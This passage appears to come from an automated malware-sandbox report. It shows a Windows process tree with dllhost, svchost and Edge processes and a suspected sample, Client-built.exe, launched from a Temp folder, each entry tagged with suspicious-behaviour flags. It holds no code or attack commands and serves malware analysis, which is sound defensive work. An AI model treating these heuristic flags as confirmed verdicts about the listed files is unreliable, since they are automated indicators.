  C:\Windows\System32\dllhost.exe /Processid:{b3ef83db-d898-49bc-b8da-8016802fe6f5}
  2⤵
  PID:7228
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{68b1a607-ff19-42b6-a0f1-9c20d821effa}
  2⤵
  PID:6428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{78f7df6a-9f08-4297-9810-976173c9de41}
  2⤵
  PID:4440
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6f7e753b-6fe3-4576-886a-eed89b870a0a}
  2⤵
  PID:8156
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f1d4b4f0-8166-4abf-8097-24528645f8aa}
  2⤵
  PID:1488
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{18eb25cc-92d9-4b9a-a99a-1d532e7311d1}
  2⤵
  PID:8824
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{222f386a-d74b-4e47-bb92-5e377c0df615}
  2⤵
  PID:3932
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2854149d-4cbe-4ce3-9cb2-10c68e3522fc}
  2⤵
  PID:6908
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c9dd2407-f7b9-400f-a4af-eb4f2982385d}
  2⤵
  PID:7920
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e3cfaef6-f4b2-4910-be67-1a48ba3297a0}
  2⤵
  PID:5508
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{364d6aec-0285-40c3-bb43-d4653ac11c1c}
  2⤵
  PID:4648
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6d9a517b-63f8-4877-b1be-05796d306a1b}
  2⤵
  PID:8580
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ba2aa5e-adcb-4e4d-b86d-204ae85b1357}
  2⤵
  PID:2384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4db56c74-f3f4-4bf0-a805-3c61b1d37de7}
  2⤵
  PID:5312
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8cebf8f5-8ed6-4e1b-ab42-6b6ba5a3d282}
  2⤵
  PID:5872
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f8836a97-1a51-4e53-a386-4273e63fd75a}
  2⤵
  PID:9816
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{29d85c6f-1f63-4076-8474-2085e53a01f2}
  2⤵
  PID:8920
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7e20c694-c13c-4088-99f8-1be3924acbfb}
  2⤵
  PID:5644
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{64d131f2-1ed8-4e42-b2fd-ea747e181052}
  2⤵
  PID:3516
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d9e19fd8-bb7d-4e25-9828-d3b66e9d23ee}
  2⤵
  PID:8220
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4906c8dc-cee8-45d2-badb-6a18302416c2}
  2⤵
  PID:8732
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8752adc7-54bb-4756-b905-9ba6c43a1b18}
  2⤵
  PID:5332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{18c6014f-0392-4897-bbfd-ab3d208b6af8}
  2⤵
  PID:8644
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3032227f-fa2b-4c0d-b695-96987855d51c}
  2⤵
  PID:6688
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{369649eb-5329-408e-963c-307d69d75a77}
  2⤵
  PID:9612
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{053690a1-cf42-40e8-a7c6-ea4669db59b8}
  2⤵
  PID:7252
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9afffc10-a257-41f6-9ac8-4902afaaf00c}
  2⤵
  PID:5072
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b2f073f5-4895-4c57-a151-d58dbe3fbb41}
  2⤵
  PID:9192
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ebfa2f7b-bfcc-4571-8574-b024fb1679a9}
  2⤵
  PID:8396
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d111b3aa-fc60-49c1-818f-0cf449246287}
  2⤵
  PID:9912
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{64355220-66f0-4b9e-bc63-43202d6baed1}
  2⤵
  PID:8368
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1e8ea7a4-f0d8-4bef-b23f-af3c36eaab82}
  2⤵
  PID:8528
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e4752bcf-9214-44b2-a843-c4bbabb59797}
  2⤵
  PID:10028
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ffdb867-e394-4075-9cf6-ac9b2e08e31c}
  2⤵
  PID:2896
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cdba4777-88c3-46b5-aec3-797388004c61}
  2⤵
  PID:7996
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{346d6166-1c45-4bc0-86cc-e83c074965c9}
  2⤵
  PID:9356
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6367b6e9-6669-43dc-b638-cd4e8220cb98}
  2⤵
  PID:6632
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fbcf138e-ebd1-4233-9adf-cfd4e849bb14}
  2⤵
  PID:6972
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a93ae1b9-fd6e-4d56-9b04-b066e080bfa6}
  2⤵
  PID:768
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a6010b1c-fb67-4dcf-857f-e7631ca6a4ff}
  2⤵
  PID:1720
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0f249ebb-4101-41ce-af1f-239d9ae45df5}
  2⤵
  PID:9136
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bf34ac3f-c245-44cc-98c8-ffaa1804b9d6}
  2⤵
  PID:9768
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a9172560-374e-46c5-8188-73184a3ae318}
  2⤵
  PID:7272
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{130d7d38-f0dc-411f-bb7b-6d3867954fd5}
  2⤵
  PID:1840
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{40c27954-f0c7-40ff-9253-bec68e2f03fa}
  2⤵
  PID:8172
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a970e8a2-2979-47c7-8967-4d36869d7aff}
  2⤵
  PID:6392
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f836e3f9-fc52-42e6-9bb9-fc91baa92ee0}
  2⤵
  PID:9980
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7bc832bd-d2cb-46b4-9624-10537293c10a}
  2⤵
  PID:3640
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{03372393-719c-4acc-a6f4-470c968a1d8d}
  2⤵
  PID:8960
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{82d015cf-68de-4087-ae70-af1c4cc59e0e}
  2⤵
  PID:6652
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0b4e50d0-a1da-4fa4-9bc4-2b688340c69b}
  2⤵
  PID:6428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ff197864-c0e7-4fc6-a72a-bee3c92876df}
  2⤵
  PID:1528
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4c2a192e-bd62-4f96-8d73-dda69085335e}
  2⤵
  PID:9640
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{58a8b4cc-299b-4ade-bd86-790d570fb2a6}
  2⤵
  PID:4924
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9270384a-c091-432f-8e0d-3d65d739095a}
  2⤵
  PID:10084
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{72f389cb-6a51-433f-a5eb-dd07557c4456}
  2⤵
  PID:6456
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cce36079-b823-4663-ad23-f07f7fe43988}
  2⤵
  PID:6232
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bd3b9079-af5f-40ae-9ac5-2383489486da}
  2⤵
  PID:396
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6c6349fb-6e32-46e7-97a8-b07964f3b95f}
  2⤵
  PID:3068
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3bfcc8eb-304c-47a2-8821-3cb2ee0e0aa0}
  2⤵
  PID:5088
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{65b6a320-401e-4339-ad29-9f13c2169e62}
  2⤵
  PID:9468
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8a421bfc-a8c4-477d-932d-62985cb4e278}
  2⤵
  PID:8048
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e5b66f40-148d-4029-b461-ab81f325b94e}
  2⤵
  PID:7348
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e554770b-7fc9-442e-ac02-f830bdb349b9}
  2⤵
  PID:2428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fb5d14ff-bca7-4604-b243-4141595fa310}
  2⤵
  PID:8432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{42a020b8-f854-4fd5-801c-27cc876a1c59}
  2⤵
  PID:8440
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8904959d-721f-40be-bb5c-4737e57fe69a}
  2⤵
  PID:6732
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{584cdebe-686b-4418-932c-7757fb35fbcb}
  2⤵
  PID:7756
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cbc49521-21f0-4eab-bbd7-fdbbe2053f2d}
  2⤵
  PID:8404
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9a3bddb1-8312-4581-af6b-fc10f87a353f}
  2⤵
  PID:9752
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f586cd28-d388-4f8a-ac5e-32f4190dd8c7}
  2⤵
  PID:7424
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4d790b36-9ee6-42a8-9ef3-43f4b176bae3}
  2⤵
  PID:6956

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Modifies data under HKEY_USERS
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1216
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1480
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x4f0 0x500
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x4f0 0x500
  2⤵
  PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1860

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2268

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2712

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3032

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3348

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3440
- C:\Users\Admin\AppData\Local\Temp\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\SplitSkip.bat" "
  2⤵
  PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\SplitSkip.bat" "
  2⤵
  PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\SplitSkip.bat" "
  2⤵
  PID:4872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\SplitSkip.bat" "
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\SplitSkip.bat" "
  2⤵
  PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\SplitSkip.bat" "
  2⤵
  PID:3136
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /7
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9b4d946f8,0x7ff9b4d94708,0x7ff9b4d94718
    3⤵
    PID:4956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
    3⤵
    PID:1684
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
    3⤵
    PID:2804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
    3⤵
    PID:2368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
    3⤵
    PID:3512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
    3⤵
    PID:544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
    3⤵
    PID:1044
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
    3⤵
    PID:712
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
    3⤵
    PID:4424
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
    3⤵
    PID:5080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
    3⤵
    PID:1128
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
    3⤵
    PID:4788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
    3⤵
    PID:1968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3612 /prefetch:8
    3⤵
    PID:1660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
    3⤵
    PID:3612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
    3⤵
    PID:1488
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
    3⤵
    PID:4812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8809955585514156509,12243578479078473255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
    3⤵
    PID:3924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
